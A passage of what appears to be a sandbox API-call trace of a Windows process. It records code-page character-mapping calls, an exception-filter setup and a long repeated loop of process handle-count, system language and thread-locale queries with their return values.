¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0149.453] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0149.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x15â\x96¯\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0149.453] GetLastError () returned 0x0 [0149.453] SetLastError (dwErrCode=0x0) [0149.453] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0149.453] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0149.453] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0149.453] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0149.453] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x15â\x96¯\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0149.453] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x41c28b) returned 0x0 [0149.453] RtlSizeHeap (HeapHandle=0x40c0000, Flags=0x0, MemoryPointer=0x40c2ea8) returned 0x80 [0149.454] GetCurrentProcess () returned 0xffffffff [0149.454] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.454] GetSystemDefaultLangID () returned 0x2670409 [0149.454] GetThreadLocale () returned 0x409 [0149.454] GetCurrentProcess () returned 0xffffffff [0149.454] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.454] GetSystemDefaultLangID () returned 0x2670409 [0149.454] GetThreadLocale () returned 0x409 [0149.454] GetCurrentProcess () returned 0xffffffff [0149.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.455] GetSystemDefaultLangID () returned 0x2670409 [0149.455] GetThreadLocale () returned 0x409 [0149.455] GetCurrentProcess () returned 0xffffffff [0149.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.455] GetSystemDefaultLangID () returned 0x2670409 [0149.455] GetThreadLocale () returned 0x409 [0149.455] GetCurrentProcess () returned 0xffffffff [0149.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.455] GetSystemDefaultLangID () returned 0x2670409 [0149.455] GetThreadLocale () returned 0x409 [0149.455] GetCurrentProcess () returned 0xffffffff [0149.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.455] GetSystemDefaultLangID () returned 0x2670409 [0149.455] GetThreadLocale () returned 0x409 [0149.455] GetCurrentProcess () returned 0xffffffff [0149.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.455] GetSystemDefaultLangID () returned 0x2670409 [0149.455] GetThreadLocale () returned 0x409 [0149.455] GetCurrentProcess () returned 0xffffffff [0149.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.455] GetSystemDefaultLangID () returned 0x2670409 [0149.455] GetThreadLocale () returned 0x409 [0149.455] GetCurrentProcess () returned 0xffffffff [0149.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.455] GetSystemDefaultLangID () returned 0x2670409 [0149.455] GetThreadLocale () returned 0x409 [0149.455] GetCurrentProcess () returned 0xffffffff [0149.455] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.455] GetSystemDefaultLangID () returned 0x2670409 [0149.455] GetThreadLocale () returned 0x409 [0149.456] GetCurrentProcess () returned 0xffffffff [0149.456] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.456] GetSystemDefaultLangID () returned 0x2670409 [0149.456] GetThreadLocale () returned 0x409 [0149.456] GetCurrentProcess () returned 0xffffffff [0149.456] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.456] GetSystemDefaultLangID () returned 0x2670409 [0149.456] GetThreadLocale () returned 0x409 [0149.456] GetCurrentProcess () returned 0xffffffff [0149.456] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.456] GetSystemDefaultLangID () returned 0x2670409 [0149.456] GetThreadLocale () returned 0x409 [0149.456] GetCurrentProcess () returned 0xffffffff [0149.456] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.456] GetSystemDefaultLangID () returned 0x2670409 [0149.456] GetThreadLocale () returned 0x409 [0149.456] GetCurrentProcess () returned 0xffffffff [0149.456] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.456] GetSystemDefaultLangID () returned 0x2670409 [0149.456] GetThreadLocale () returned 0x409 [0149.456] GetCurrentProcess () returned 0xffffffff [0149.456] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.456] GetSystemDefaultLangID () returned 0x2670409 [0149.456] GetThreadLocale () returned 0x409 [0149.456] GetCurrentProcess () returned 0xffffffff [0149.456] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.457] GetSystemDefaultLangID () returned 0x2670409 [0149.457] GetThreadLocale () returned 0x409 [0149.457] GetCurrentProcess () returned 0xffffffff [0149.457] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.457] GetSystemDefaultLangID () returned 0x2670409 [0149.457] GetThreadLocale () returned 0x409 [0149.457] GetCurrentProcess () returned 0xffffffff [0149.457] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.457] GetSystemDefaultLangID () returned 0x2670409 [0149.457] GetThreadLocale () returned 0x409 [0149.457] GetCurrentProcess () returned 0xffffffff [0149.457] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.457] GetSystemDefaultLangID () returned 0x2670409 [0149.457] GetThreadLocale () returned 0x409 [0149.457] GetCurrentProcess () returned 0xffffffff [0149.457] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.457] GetSystemDefaultLangID () returned 0x2670409 [0149.457] GetThreadLocale () returned 0x409 [0149.457] GetCurrentProcess () returned 0xffffffff [0149.457] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.457] GetSystemDefaultLangID () returned 0x2670409 [0149.457] GetThreadLocale () returned 0x409 [0149.458] GetCurrentProcess () returned 0xffffffff [0149.458] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.458] GetSystemDefaultLangID () returned 0x2670409 [0149.458] GetThreadLocale () returned 0x409 [0149.458] GetCurrentProcess () returned 0xffffffff [0149.458] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.458] GetSystemDefaultLangID () returned 0x2670409 [0149.458] GetThreadLocale () returned 0x409 [0149.458] GetCurrentProcess () returned 0xffffffff [0149.458] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.458] GetSystemDefaultLangID () returned 0x2670409 [0149.458] GetThreadLocale () returned 0x409 [0149.458] GetCurrentProcess () returned 0xffffffff [0149.458] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.458] GetSystemDefaultLangID () returned 0x2670409 [0149.458] GetThreadLocale () returned 0x409 [0149.458] GetCurrentProcess () returned 0xffffffff [0149.458] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.458] GetSystemDefaultLangID () returned 0x2670409 [0149.458] GetThreadLocale () returned 0x409 [0149.458] GetCurrentProcess () returned 0xffffffff [0149.458] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.458] GetSystemDefaultLangID () returned 0x2670409 [0149.459] GetThreadLocale () returned 0x409 [0149.459] GetCurrentProcess () returned 0xffffffff [0149.459] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.459] GetSystemDefaultLangID () returned 0x2670409 [0149.459] GetThreadLocale () returned 0x409 [0149.459] GetCurrentProcess () returned 0xffffffff [0149.459] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.459] GetSystemDefaultLangID () returned 0x2670409 [0149.459] GetThreadLocale () returned 0x409 [0149.459] GetCurrentProcess () returned 0xffffffff [0149.459] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.459] GetSystemDefaultLangID () returned 0x2670409 [0149.459] GetThreadLocale () returned 0x409 [0149.459] GetCurrentProcess () returned 0xffffffff [0149.459] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.459] GetSystemDefaultLangID () returned 0x2670409 [0149.459] GetThreadLocale () returned 0x409 [0149.459] GetCurrentProcess () returned 0xffffffff [0149.459] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.459] GetSystemDefaultLangID () returned 0x2670409 [0149.459] GetThreadLocale () returned 0x409 [0149.459] GetCurrentProcess () returned 0xffffffff [0149.459] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.459] GetSystemDefaultLangID () returned 0x2670409 [0149.459] GetThreadLocale () returned 0x409 [0149.459] GetCurrentProcess () returned 0xffffffff [0149.459] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.460] GetSystemDefaultLangID () returned 0x2670409 [0149.460] GetThreadLocale () returned 0x409 [0149.460] GetCurrentProcess () returned 0xffffffff [0149.460] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.460] GetSystemDefaultLangID () returned 0x2670409 [0149.460] GetThreadLocale () returned 0x409 [0149.460] GetCurrentProcess () returned 0xffffffff [0149.460] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.460] GetSystemDefaultLangID () returned 0x2670409 [0149.460] GetThreadLocale () returned 0x409 [0149.460] GetCurrentProcess () returned 0xffffffff [0149.460] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.460] GetSystemDefaultLangID () returned 0x2670409 [0149.460] GetThreadLocale () returned 0x409 [0149.460] GetCurrentProcess () returned 0xffffffff [0149.460] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.460] GetSystemDefaultLangID () returned 0x2670409 [0149.460] GetThreadLocale () returned 0x409 [0149.460] GetCurrentProcess () returned 0xffffffff [0149.460] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.460] GetSystemDefaultLangID () returned 0x2670409 [0149.460] GetThreadLocale () returned 0x409 [0149.460] GetCurrentProcess () returned 0xffffffff [0149.460] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.460] GetSystemDefaultLangID () returned 0x2670409 [0149.461] GetThreadLocale () returned 0x409 [0149.461] GetCurrentProcess () returned 0xffffffff [0149.461] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.461] GetSystemDefaultLangID () returned 0x2670409 [0149.461] GetThreadLocale () returned 0x409 [0149.461] GetCurrentProcess () returned 0xffffffff [0149.461] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.461] GetSystemDefaultLangID () returned 0x2670409 [0149.461] GetThreadLocale () returned 0x409 [0149.461] GetCurrentProcess () returned 0xffffffff [0149.461] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.461] GetSystemDefaultLangID () returned 0x2670409 [0149.461] GetThreadLocale () returned 0x409 [0149.461] GetCurrentProcess () returned 0xffffffff [0149.461] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.461] GetSystemDefaultLangID () returned 0x2670409 [0149.461] GetThreadLocale () returned 0x409 [0149.461] GetCurrentProcess () returned 0xffffffff [0149.461] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.461] GetSystemDefaultLangID () returned 0x2670409 [0149.461] GetThreadLocale () returned 0x409 [0149.461] GetCurrentProcess () returned 0xffffffff [0149.462] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.462] GetSystemDefaultLangID () returned 0x2670409 [0149.462] GetThreadLocale () returned 0x409 [0149.462] GetCurrentProcess () returned 0xffffffff [0149.462] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.462] GetSystemDefaultLangID () returned 0x2670409 [0149.462] GetThreadLocale () returned 0x409 [0149.462] GetCurrentProcess () returned 0xffffffff [0149.462] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.462] GetSystemDefaultLangID () returned 0x2670409 [0149.462] GetThreadLocale () returned 0x409 [0149.462] GetCurrentProcess () returned 0xffffffff [0149.462] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.462] GetSystemDefaultLangID () returned 0x2670409 [0149.462] GetThreadLocale () returned 0x409 [0149.462] GetCurrentProcess () returned 0xffffffff [0149.462] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.462] GetSystemDefaultLangID () returned 0x2670409 [0149.462] GetThreadLocale () returned 0x409 [0149.462] GetCurrentProcess () returned 0xffffffff [0149.462] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.462] GetSystemDefaultLangID () returned 0x2670409 [0149.462] GetThreadLocale () returned 0x409 [0149.462] GetCurrentProcess () returned 0xffffffff [0149.462] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.462] GetSystemDefaultLangID () returned 0x2670409 [0149.463] GetThreadLocale () returned 0x409 [0149.463] GetCurrentProcess () returned 0xffffffff [0149.463] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.463] GetSystemDefaultLangID () returned 0x2670409 [0149.463] GetThreadLocale () returned 0x409 [0149.463] GetCurrentProcess () returned 0xffffffff [0149.463] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.463] GetSystemDefaultLangID () returned 0x2670409 [0149.463] GetThreadLocale () returned 0x409 [0149.463] GetCurrentProcess () returned 0xffffffff [0149.463] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.463] GetSystemDefaultLangID () returned 0x2670409 [0149.463] GetThreadLocale () returned 0x409 [0149.463] GetCurrentProcess () returned 0xffffffff [0149.463] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.463] GetSystemDefaultLangID () returned 0x2670409 [0149.463] GetThreadLocale () returned 0x409 [0149.463] GetCurrentProcess () returned 0xffffffff [0149.463] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.560] GetSystemDefaultLangID () returned 0x2670409 [0149.560] GetThreadLocale () returned 0x409 [0149.591] GetCurrentProcess () returned 0xffffffff [0149.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.603] GetSystemDefaultLangID () returned 0x2670409 [0149.603] GetThreadLocale () returned 0x409 [0149.603] GetCurrentProcess () returned 0xffffffff [0149.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.603] GetSystemDefaultLangID () returned 0x2670409 [0149.603] GetThreadLocale () returned 0x409 [0149.603] GetCurrentProcess () returned 0xffffffff [0149.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.603] GetSystemDefaultLangID () returned 0x2670409 [0149.603] GetThreadLocale () returned 0x409 [0149.603] GetCurrentProcess () returned 0xffffffff [0149.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0149.603] GetSystemDefaultLangID () returned 